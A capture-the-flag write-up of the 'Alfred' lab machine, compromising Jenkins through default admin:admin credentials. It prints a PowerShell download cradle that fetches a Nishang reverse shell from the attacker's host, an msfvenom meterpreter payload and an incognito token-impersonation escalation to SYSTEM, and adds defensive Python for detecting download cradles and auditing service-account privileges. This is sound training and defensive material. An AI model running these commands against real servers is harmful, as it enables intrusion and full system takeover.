Alfred

  • Exploit common misconfigurations on Jenkins, a widely used automation server.
  • Jenkins is utilized during DevOps integration and continuous development pipelines.
  • It allows developers to automatically deploy their code after making changes.
```shell
IP=10.10.50.153
┌──(kali㉿kali)-[~/assets]
└─$ nmap -sV -sC -T5 -vvv $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 18:50 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating Ping Scan at 18:50
Scanning 10.10.50.153 [2 ports]
Completed Ping Scan at 18:50, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:50
Completed Parallel DNS resolution of 1 host. at 18:50, 0.09s elapsed
DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:50
Scanning 10.10.50.153 [1000 ports]
Discovered open port 3389/tcp on 10.10.50.153
Discovered open port 8080/tcp on 10.10.50.153
Discovered open port 80/tcp on 10.10.50.153
```

  • Number of open TCP ports: 4
  • Navigated to the site and found information.

```html
<img width="200" height+"300" src="bruce.jpg"><br /><br />RIP Bruce Wayne<br /><br /> Donations to <strong>[email protected]</strong> are greatly appreciated.
```

  • Navigated to: http://10.10.50.153:8080
  • Tried username and password: admin:admin
  • Login was successful.
  • Created a Jenkins project by selecting “New Item”.
```shell
┌──(kali㉿kali)-[~/assets]
└─$ wget https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/2c6e4a2d6fd72ba0f103cce2afa3b492e347edc2/powershell_reverse_shell.ps1


┌──(kali㉿kali)-[~/assets]
└─$ mv powershell_reverse_shell.ps1 PowerShell.ps1

#INCLUDE MY IP AND PORT
vim PowerShell.ps1


┌──(kali㉿kali)-[~/assets]
└─$ mv PowerShell.ps1 ../server

┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(kali㉿kali)-[~/assets]
└─$ netcat -nlvp 4443
listening on [any] 4443 ...


#ON JENKINS I ENTERED:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56/PowerShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443

#GOT ERROR

WorkflowScript: 5: unexpected token: Net @ line 5, column 28.
   powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56/PowerShell.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443
                              ^

1 error


#HAVE TO DO IT THROUGH GROOVY SCRIPT?

~NO

#ABLE TO RUN "EXECUTE WINDOWS BATCH COMMAND"

#TRY AGAIN

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

┌──(kali㉿kali)-[~/nishang/Execution]
└─$ mv Invoke-PowerShellTcp.ps1 /home/kali/server/

┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...


#IN JENKINS
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.53.56:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443

┌──(kali㉿kali)-[~/server]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.50.153 - - [08/May/2022 19:28:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -


┌──(kali㉿kali)-[~/assets]
└─$ netcat -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.50.153] 49223
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files (x86)\Jenkins\workspace\project>


PS C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce
PS C:\Program Files (x86)\Jenkins\workspace\project>

PS C:\Users\bruce> cd Desktop
PS C:\Users\bruce\Desktop> ls


    Directory: C:\Users\bruce\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        10/25/2019  11:22 PM         32 user.txt


PS C:\Users\bruce\Desktop> cat user.txt
79007a09481963edf2e1321abd9ae2a0
PS C:\Users\bruce\Desktop>
```

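The build step above works because the Jenkins service account can run an arbitrary PowerShell download cradle (`New-Object Net.WebClient` + `DownloadString`/`DownloadFile` + `iex`) and then pull a reverse-shell script from an attacker-controlled web server. From the defender's side, those same strings are a reliable detection signal in Jenkins console output and in PowerShell script block logs (Event ID 4104). The scorer below is an added example written for this page, not code from the writeup or from Jenkins; the three sample log lines, the indicator list and the weights are my own constructions, with the command text mirroring what was pasted into the build step.

```python
"""Flag PowerShell download-cradle and reverse-shell staging in log lines.

Added example for this writeup. Sample lines are constructed, not real logs.
"""
import re
from dataclasses import dataclass

# Constructed sample input: one Jenkins console line and two PowerShell
# script block log (Event ID 4104) messages. The third line is benign.
SAMPLE_LOGS = [
    "2022-05-08T19:28:10 jenkins build#3 [project] cmd.exe /c powershell iex "
    "(New-Object Net.WebClient).DownloadString('http://10.11.53.56:80/Invoke-PowerShellTcp.ps1');"
    "Invoke-PowerShellTcp -Reverse -IPAddress 10.11.53.56 -Port 4443",
    "2022-05-08T19:39:30 Microsoft-Windows-PowerShell 4104 ScriptBlockText="
    "(New-Object System.Net.WebClient).Downloadfile('http://10.11.53.56:80/shell.exe','shell.exe')",
    "2022-05-08T19:40:02 Microsoft-Windows-PowerShell 4104 ScriptBlockText="
    "Get-ChildItem C:\\Users\\bruce\\Desktop",
]

# Indicator name, case-insensitive pattern, weight (weights are my own choice).
INDICATORS = [
    ("webclient_object", re.compile(r"new-object\s+(system\.)?net\.webclient", re.I), 2),
    ("download_method", re.compile(r"\.download(string|file|data)\s*\(", re.I), 2),
    ("invoke_expression", re.compile(r"(^|[\s;(])(iex|invoke-expression)\b", re.I), 2),
    ("nishang_tcp_shell", re.compile(r"invoke-powershelltcp", re.I), 3),
    ("reverse_flag", re.compile(r"-reverse\b", re.I), 1),
    ("http_ip_url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 1),
    ("quoted_exe", re.compile(r"['\"][^'\"]+\.exe['\"]", re.I), 1),
]


@dataclass
class Finding:
    line_no: int
    score: int
    hits: list


def score_line(line):
    """Return (total weight, list of indicator names) for one log line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(line)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def scan(lines, threshold=4):
    """Return a Finding for every line whose indicator score reaches the threshold.

    A single indicator (e.g. a bare IP URL) is not enough; the threshold requires
    at least the object-plus-method pair or the Nishang shell name.
    """
    findings = []
    for i, line in enumerate(lines, 1):
        score, hits = score_line(line)
        if score >= threshold:
            findings.append(Finding(i, score, hits))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: score {f.score} hits={', '.join(f.hits)}")
```

Point the same scorer at real 4104 script block text or at Jenkins build console logs; the benign `Get-ChildItem` line scores zero, while both staging commands from this walkthrough score well above the threshold.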
Switching Shells

Switched to a meterpreter reverse shell using the following process:

```shell
┌──(kali㉿kali)-[~/server]
└─$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.53.56 LPORT=4443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe


PS C:\Users\bruce\Desktop> powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.53.56:80/shell.exe','shell.exe')"


┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.50.153 - - [08/May/2022 19:39:30] "GET /shell.exe HTTP/1.1" 200 -


msfconsole


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.11.53.56
LHOST => 10.11.53.56
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) >



PS C:\Users\bruce\Desktop> . .\shell.exe



msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.53.56:4443
[*] Sending stage (175174 bytes) to 10.10.50.153
[*] Meterpreter session 2 opened (10.11.53.56:4443 -> 10.10.50.153:49250 ) at 2022-05-08 19:45:25 -0400

meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2022-05-08 19:45:11 -0400  shell.exe
```


Privilege Escalation

```powershell
use powershell
meterpreter > powershell_shell
PS >

PS > whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
```
  • Initial access has been obtained.
  • Use token impersonation to gain system access.
  • Windows uses tokens to manage account permissions for actions.
  • Account tokens are assigned during login or authentication by LSASS.exe.
  • Access tokens include User SIDs, group SIDs, and privileges.

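The root cause on this box is not Jenkins itself but the account Jenkins runs as: the `whoami /priv` table shows that `bruce` holds SeImpersonatePrivilege and SeDebugPrivilege, which is what makes the token theft that follows possible. A defender auditing a build server wants the same table read mechanically, and wants to know which high-impact privileges the account holds at all, not only which are currently enabled, because a process that holds a Disabled privilege can turn it on for itself with AdjustTokenPrivileges. The checker below is an added example for this page, not code from the writeup; the sample input is the `whoami /priv` output shown above, and the set of privileges treated as high-impact is my own list.

```python
"""Audit a `whoami /priv` table for high-impact privileges held by a service account.

Added example for this writeup. The sample table is the output shown on the page.
"""
import re

WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
"""

# Privileges that let their holder escalate or tamper with other principals.
# This selection is my own; extend it to match local policy.
HIGH_IMPACT = {
    "SeImpersonatePrivilege": "impersonate clients, i.e. adopt another principal's token",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and inspect any process, including SYSTEM ones",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeManageVolumePrivilege": "raw volume access",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}

ROW = re.compile(r"^(Se\w+)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Map privilege name -> True if Enabled, False if Disabled."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def audit(privs):
    """Split the high-impact privileges into those merely held and those enabled."""
    held = sorted(p for p in privs if p in HIGH_IMPACT)
    enabled = sorted(p for p in held if privs[p])
    return {"held": held, "enabled": enabled}


if __name__ == "__main__":
    report = audit(parse_privileges(WHOAMI_PRIV_OUTPUT))
    for p in report["held"]:
        state = "ENABLED" if p in report["enabled"] else "held (disabled)"
        print(f"{p:32} {state:16} {HIGH_IMPACT[p]}")
```

On this table the audit reports two enabled privileges (SeDebugPrivilege and SeImpersonatePrivilege) and five more high-impact ones merely held, which is far more than a build runner needs. The fix is to run the Jenkins service and its agents under a dedicated account that holds none of these, rather than a user in the local Administrators group.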


  • Two privileges are enabled: SeDebugPrivilege and SeImpersonatePrivilege.
  • The incognito module will be used to exploit this vulnerability.

```powershell
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter >
```

We will now check which tokens are available:
```powershell
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\CryptSvc
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\LanmanWorkstation
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\NlaSvc
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\TermService
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
```

  • The BUILTIN\Administrators delegation token is available.
  • Proceed to impersonate the Administrators token.
```powershell
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

  • Having a higher privileged token does not guarantee privileged user permissions.
  • Windows determines permissions based on the Primary Token of the process.
  • The impersonated token is not used to determine process capabilities.

  • Migrate to a process while impersonating NT AUTHORITY\SYSTEM.
  • The safest choice for migration is the services.exe process.
```powershell
 668   580   services.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 2664 to 668...
[*] Migration completed successfully.
meterpreter >


100666/rw-rw-rw-  70        fil   2019-10-26 07:36:00 -0400  root.txt
040777/rwxrwxrwx  4096      dir   2010-11-20 21:41:37 -0500  systemprofile

meterpreter > cat root.txt
��dff0f748678f280250f25a45b8046b4a
meterpreter >
```



This post is licensed under CC BY 4.0 by the author.